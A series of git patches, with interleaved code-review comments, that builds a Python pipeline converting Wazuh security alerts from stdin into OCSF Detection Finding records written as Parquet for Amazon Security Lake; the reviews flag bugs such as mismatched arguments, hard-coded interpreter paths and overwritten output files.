@@ -95,7 +96,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings) + current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From 34f295b9cbd0074f10dc93bd6878bc031e1a81e6 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:19:31 -0300 Subject: [PATCH 17/77] Use custom ocsf module to map alerts --- .../stdin_to_securitylake.py | 38 ++++++++++--------- 1 file changed, 20 insertions(+), 18 deletions(-) rename integrations/{ => amazon-security-lake}/stdin_to_securitylake.py (84%) diff --git a/integrations/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py similarity index 84% rename from integrations/stdin_to_securitylake.py rename to integrations/amazon-security-lake/stdin_to_securitylake.py index 5efb9da83bb80..21374d85ee0ad 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py 
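Review bot: `map_block(stdin, args.linebuffer, mappings,args.ocsfschema)` passes four arguments, but `map_block` as shown in the `@@ -51,7 +51,7 @@` hunk above still takes `(fileobject, length, mappings)` and calls `map_to_ocsf(alert, mappings, ocsf_mapped_alert)` without the schema, so the first iteration raises `TypeError`. The new parameter needs to be threaded through: `def map_block(fileobject, length, mappings, ocsfschema):` and `map_to_ocsf(alert, mappings, ocsf_mapped_alert, ocsfschema)`. The enclosing loop starts and ends outside the hunk.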
@@ -9,26 +9,28 @@ from datetime import datetime from pyarrow import parquet, Table, fs +import ocsf + block_ending = { "block_ending": True } s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): - ocsf_output = {} - ### Put constants into the output alert - ocsf_output |= mappings[ocsfschema]['constants'] - - for key in mappings[ocsfschema]['mappings']: - dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) - depth_levels = dotted_destination.split('.') - current_level = alert_dictionary[depth_levels[0]] - if len(depth_levels>1): - for field in depth_levels[1:]: - current_level = current_level[field] - ocsf_output[key] = current_level - ### We probably need to crop the fields we already - ### mapped to OCSF from ocsf_output - ocsf_output['unmapped'] = alert_dictionary +#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): +# ocsf_output = {} +# ### Put constants into the output alert +# ocsf_output |= mappings[ocsfschema]['constants'] +# +# for key in mappings[ocsfschema]['mappings']: +# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) +# depth_levels = dotted_destination.split('.') +# current_level = alert_dictionary[depth_levels[0]] +# if len(depth_levels>1): +# for field in depth_levels[1:]: +# current_level = current_level[field] +# ocsf_output[key] = current_level +# ### We probably need to crop the fields we already +# ### mapped to OCSF from ocsf_output +# ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -49,8 +51,8 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = {} - map_to_ocsf(alert, mappings, ocsf_mapped_alert): + ocsf_mapped_alert = ocsf.convert(alert) + #map_to_ocsf(alert, mappings, ocsf_mapped_alert): output.append(ocsf_mapped_alert) return output 
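Review bot: the old `map_to_ocsf` is kept as a block of commented-out lines instead of being deleted, and the second hunk leaves `#map_to_ocsf(alert, mappings, ocsf_mapped_alert):` beside the new call; git history already preserves the old implementation, so both should go rather than accumulate as dead text. `import ocsf` assumes the `ocsf` directory is an importable package exposing `convert`, yet the only module shown on this page is `ocsf/converter.py` with no `__init__.py` in any diffstat, so `ocsf.convert(alert)` in the second hunk probably needs to be `from ocsf.converter import convert` or an `__init__.py` that re-exports it. `map_block` in the second hunk starts outside its hunk.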
From fd63e9ec79d933c848029019168e3c98d3fed7a1 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:53:40 -0300 Subject: [PATCH 18/77] Modify script to use converter class --- .../amazon-security-lake/ocsf/converter.py | 40 ++++++++--------- .../stdin_to_securitylake.py | 45 +++++++++---------- 2 files changed, 42 insertions(+), 43 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index fba84e7304dc7..2a14b75957c97 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,30 +27,30 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], "finding_info": { "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], "type_id": 1, - "uid": event["_source"]["rule"]["id"], + "uid": event["rule"]["id"], }, "attacks": { "tactic": { - "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "name": join(event["rule"]["mitre"]["tactic"]), }, "technique": { - "name": join(event["_source"]["rule"]["mitre"]["technique"]), - "uid": join(event["_source"]["rule"]["mitre"]["id"]), + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), }, "version": "v13.1" }, - "title": event["_source"]["rule"]["description"], + "title": event["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + event["input"]["type"] ], - "uid": event["_source"]['id'] + "uid": event['id'] }, "metadata": { "log_name": "Security events", 
@@ -62,25 +62,25 @@ def convert(event: dict) -> dict: }, "version": "1.1.0", }, - "raw_data": event["_source"]["full_log"], + "raw_data": event["full_log"], "resources": [ { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "name": event["agent"]["name"], + "uid": event["agent"]["id"] }, ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), "status_id": 99, - "time": event["_source"]["timestamp"], + "time": event["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + event["location"], + event["manager"]["name"] ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "nist": event["rule"]["nist_800_53"], # Array } } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 21374d85ee0ad..49926a8aa1d64 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -6,10 +6,10 @@ import logging import time import json -from datetime import datetime +import datetime from pyarrow import parquet, Table, fs -import ocsf +from ocsf import converter block_ending = { "block_ending": True } @@ -43,7 +43,7 @@ def encode_parquet(list,bucket_name,folder): table = Table.from_pylist(list) parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def map_block(fileobject, length, mappings): +def map_block(fileobject, length): output=[] for line in range(0, length): line = fileobject.readline() 
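Review bot: with the `_source` prefix dropped everywhere else, `event["_index"]` in `unmapped.data_sources` is the one lookup still reading the search-hit envelope rather than the document, and once `convert` receives the bare document that key is absent and the whole conversion raises `KeyError`; read it as `event.get("_index")` or drop it from the list. This also pulls in the opposite direction from the Logstash change on this page, `target => "_source"`, which nests the document under `_source`; the two files need to agree on the event shape. `convert` starts outside the hunk.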
@@ -51,44 +51,41 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = ocsf.convert(alert) + ocsf_mapped_alert = converter.convert(alert) #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): - current_time = datetime.now(tz='UTC') + current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() -def parse_arguments(): + +if __name__ == "__main__": + clock = datetime.datetime.now(datetime.timezone.utc) + clockstr = clock.strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - debugging = parser.add_argument_group('debugging') - debugging.add_argument('-o','--output', type=str, 
default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') - debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') args = parser.parse_args() - -if __name__ == "__main__": - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H.%M.%S') - parse_arguments() - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) + #with open(ocsf_mapping_filename) as jsonfile: + # mappings = json.loads(jsonfile.read()) - with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) try: while True: 
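Review bot: `--debug` is parsed but never consulted — `logging.basicConfig(... level=logging.DEBUG)` is unconditional, so every run writes at DEBUG, and the main loop's `logging.debug(json.dumps(output_buffer))` puts full alert contents into the new fixed default `/tmp/stdintosecuritylake.txt`, a predictable path in a shared directory; use `level=logging.DEBUG if args.debug else logging.INFO` and default the log to stderr or a dedicated log directory rather than `/tmp`. `--maxlength`, `--linebuffer`, `--sleeptime` and `--pushinterval` have integer defaults but no `type=int`, so a value given on the command line arrives as a string and `time.sleep(args.sleeptime)`, `range(0, length)` and the `>` comparisons fail; add `type=int` to each. `--mapping` and `--ocsfschema` remain although their consumer is now commented out. The `while True` loop continues past the hunk.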
@@ -98,14 +95,14 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) + current_block = map_block(stdin, args.linebuffer ) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] output_buffer.append(current_block) @@ -117,4 +114,6 @@ def parse_arguments(): except Exception as e: logging.error("Error running script") + logging.error(e) + raise exit(1) From d32e06d003fad02248d2538c0fbd41c116eea983 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:28:51 -0300 Subject: [PATCH 19/77] Code polish and fix errors --- .../amazon-security-lake/ocsf/converter.py | 152 +++++++++--------- .../stdin_to_securitylake.py | 87 +++------- 2 files changed, 102 insertions(+), 137 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index 2a14b75957c97..c927afa8fe87f 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py 
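Review bot: `output_buffer.append(current_block)` on the last line of the hunk adds the whole list returned by `map_block` as a single element, whereas the `block_ending` branch above uses `+=`, so `len(output_buffer) > args.maxlength` counts blocks rather than events and `encode_parquet` receives a list of lists; it should be `output_buffer += current_block` in both branches. The new call `map_block(stdin, args.linebuffer )` also carries a stray space before the closing parenthesis. The surrounding loop starts and ends outside the hunk.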
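Review bot: `exit(1)` after `raise` is unreachable, and the two `logging.error` calls lose the traceback; replace them with `logging.exception("Error running script")`, which records the exception and stack in one call, and then pick one of re-raising or exiting rather than both. The `try` this handler belongs to starts outside the hunk.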
@@ -1,87 +1,89 @@ -#!/usr/bin/python +#!/usr/bin/python3 # event comes from Filebeat -event = {} - +#event = {} +#print(event) def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level def join(iterable, separator=","): - return (separator.join(iterable)) + return (separator.join(iterable)) def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "dummy": True + }, + "technique": { + #"name": join(event["_source"]["rule"]["mitre"]["technique"]), + #"uid": join(event["_source"]["rule"]["mitre"]["id"]), + "dummy": True + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", + }, + #"raw_data": event["_source"]["full_log"], + "resources": [ { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + #event["_source"]["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + #"nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } - return ocsf_class_template + 
return ocsf_class_template diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 49926a8aa1d64..4fdecc14c073e 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python3 +#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 import os import sys 
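Review bot: `normalize()` still returns the Wazuh rule level unchanged although its docstring promises the 0-6 OCSF range, so `severity_id` is filled with levels up to 15 that are not valid OCSF severity ids; until the mapping is written, return a value the schema accepts (for example 0/Unknown for anything out of range) rather than the raw level. The `"dummy": True` placeholders under `attacks.tactic` and `attacks.technique` are emitted in every record as non-schema keys — omit the `attacks` object when `rule.mitre` is absent instead. Every lookup is a hard `event["_source"][...]` index, so an alert without `decoder.name`, `input.type` or `agent` raises `KeyError`, which the caller re-raises and the whole pipeline stops; use `.get()` with defaults for fields that are optional in Wazuh alerts. `vendor_name` also still carries the typo `"Wazuh, Inc,."`.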
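Review bot: the shebang now points at an absolute `/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3` that exists only on the build machine, so running the file directly anywhere else fails with "bad interpreter". Keep `#!/usr/bin/env python3` and choose the virtualenv when launching; the Logstash `pipe` command in this series already invokes the script through `/usr/bin/env python3`, so the venv path buys nothing there.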
@@ -7,44 +7,18 @@ import time import json import datetime -from pyarrow import parquet, Table, fs - +from pyarrow import parquet, Table from ocsf import converter block_ending = { "block_ending": True } -s3 = fs.S3FileSystem() - -#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): -# ocsf_output = {} -# ### Put constants into the output alert -# ocsf_output |= mappings[ocsfschema]['constants'] -# -# for key in mappings[ocsfschema]['mappings']: -# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) -# depth_levels = dotted_destination.split('.') -# current_level = alert_dictionary[depth_levels[0]] -# if len(depth_levels>1): -# for field in depth_levels[1:]: -# current_level = current_level[field] -# ocsf_output[key] = current_level -# ### We probably need to crop the fields we already -# ### mapped to OCSF from ocsf_output -# ocsf_output['unmapped'] = alert_dictionary - -def encode_parquet(list,bucket_name,folder): - ### We can write directly to S3 from pyarrow: - ### https://arrow.apache.org/docs/python/filesystems.html#s3 - ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream - ### - ### Credentials can be stored in ~/.aws/credentials - ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html - +def encode_parquet(list,foldername,filename): table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) def map_block(fileobject, length): output=[] + ocsf_mapped_alert = {} for line in range(0, length): line = fileobject.readline() if line == '': 
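Review bot: `def encode_parquet(list,foldername,filename)` names its first parameter `list`, shadowing the builtin inside the body, and the `ocsf_mapped_alert = {}` added to `map_block` is dead because the name is rebound on every iteration; rename the parameter (`records`) and drop the initialiser. With `fs` and `S3FileSystem` removed here, the only sink is `parquet.write_table(table, '{}/{}.parquet'.format(foldername, filename))` — whether that resolves an `s3://` prefix on its own, as the `--outputfolder` help text in this commit suggests, should be confirmed before relying on it, and any S3 failure would surface only through the generic handler in `__main__`.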
@@ -52,36 +26,28 @@ def map_block(fileobject, length): break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) - #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() - if __name__ == "__main__": - clock = datetime.datetime.now(datetime.timezone.utc) - clockstr = clock.strftime('%F_%H.%M.%S') + date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') - parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') - parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') - parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') - parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate 
debugging') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - #with open(ocsf_mapping_filename) as jsonfile: - # mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] 
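Review bot: one malformed line, or one alert missing a field `converter.convert` indexes, raises out of `map_block` at `alert = json.loads(line)` / `ocsf_mapped_alert = converter.convert(alert)`, and the `except Exception: ... raise` in `__main__` then terminates the pipeline and discards everything buffered but not yet written. Skip and log the bad event instead so a single poison record cannot stop ingestion. The new `logging.basicConfig(..., level=logging.DEBUG)` also ignores `args.debug`; use `level=logging.DEBUG if args.debug else logging.INFO`.
```python
        try:
            alert = json.loads(line)
            output.append(converter.convert(alert))
        except (json.JSONDecodeError, KeyError) as exc:
            # one bad event must not take the whole pipeline down
            logging.warning("skipping unparseable event: %s", exc)
    return output
```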
@@ -89,22 +55,20 @@ def get_elapsedseconds(reference_timestamp): try: while True: - ### We can possibly replace all the custom code here - ### and just use Arrow's built-in input and output facilities: - ### * https://arrow.apache.org/docs/python/memory.html#input-and-output - ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas - ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - - current_block = map_block(stdin, args.linebuffer ) - if current_block[-1] == block_ending : - output_buffer += current_block[0:current_block.index(block_ending)] - time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.bucketname,args.foldername) + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] - output_buffer.append(current_block) + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") @@ -116,4 +80,3 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise - exit(1) From ab56e896868cdef5fdeee92a42a8e1b00b5fae9f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:38:53 -0300 Subject: [PATCH 20/77] Remove unnecessary type declaration from debug flag --- integrations/amazon-security-lake/stdin_to_securitylake.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 4fdecc14c073e..b8fa6c17bbf4c 100755 
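Review bot: `date` is computed once at startup, so every flush calls `encode_parquet(output_buffer, args.outputfolder, 'wazuh-{}'.format(date))` with the same filename and `parquet.write_table` overwrites the previous batch — only the last flush before the process exits survives. Derive the name at flush time, e.g. `'wazuh-{}'.format(datetime.datetime.now(datetime.timezone.utc).strftime('%Y-%m-%d_%H.%M.%S'))` (`%F` is a libc extension, not guaranteed on every platform), or append a counter. The flush check now runs before the freshly read block is added, so the buffer can exceed `maxlength` by up to one block; harmless, but worth a comment. The `while` loop is opened outside this hunk.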
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -36,7 +36,7 @@ def get_elapsedseconds(reference_timestamp): if __name__ == "__main__": date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') From 7fc49e72ae93fd9620fc7f467a37eef714d53d6c Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 17:00:15 -0300 Subject: [PATCH 21/77] Improved parquet encoding --- .../stdin_to_securitylake.py | 29 ++++++++++++------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index b8fa6c17bbf4c..ec90025d9afa3 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 +#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 import os import sys 
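Review bot: `--debug` now parses correctly, but nothing in this hunk reads `args.debug`, and as far as this series shows the logger is configured at `logging.DEBUG` unconditionally, so the flag is a no-op; either wire it, `level=logging.DEBUG if args.debug else logging.INFO`, or remove it. The `-l` default `/tmp/stdintosecuritylake.txt` is a predictable path in a world-writable directory that will receive log output about every alert — prefer a directory with restricted permissions.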
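Review bot: the shebang now hard-codes a developer's home directory, `/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3`, which no deployment will have; restore `#!/usr/bin/env python3` and activate the venv from the launcher (the Logstash `pipe` command in this series already runs the script via `/usr/bin/env python3`).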
@@ -13,8 +13,13 @@ block_ending = { "block_ending": True } def encode_parquet(list,foldername,filename): - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + try: + table = Table.from_pylist(list) + print(table) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + except Exception as e: + logging.error(e) + raise def map_block(fileobject, length): output=[] @@ -44,7 +49,8 @@ def get_elapsedseconds(reference_timestamp): parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: @@ -55,12 +61,6 @@ def get_elapsedseconds(reference_timestamp): try: while True: - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] current_block = map_block( stdin, args.linebuffer ) 
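Review bot: `logging.error(e)` in the new `except` drops the traceback; use `logging.exception("failed to encode %d events", len(list))`. Because the error is re-raised here and again in `__main__`, one batch that `Table.from_pylist` cannot unify (alerts whose nested keys differ yield conflicting inferred schemas) kills the process and the whole buffer is lost — consider dumping the offending batch as JSON to a quarantine file before re-raising. `print(table)` also writes the entire table, i.e. every alert, to stdout on each flush.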
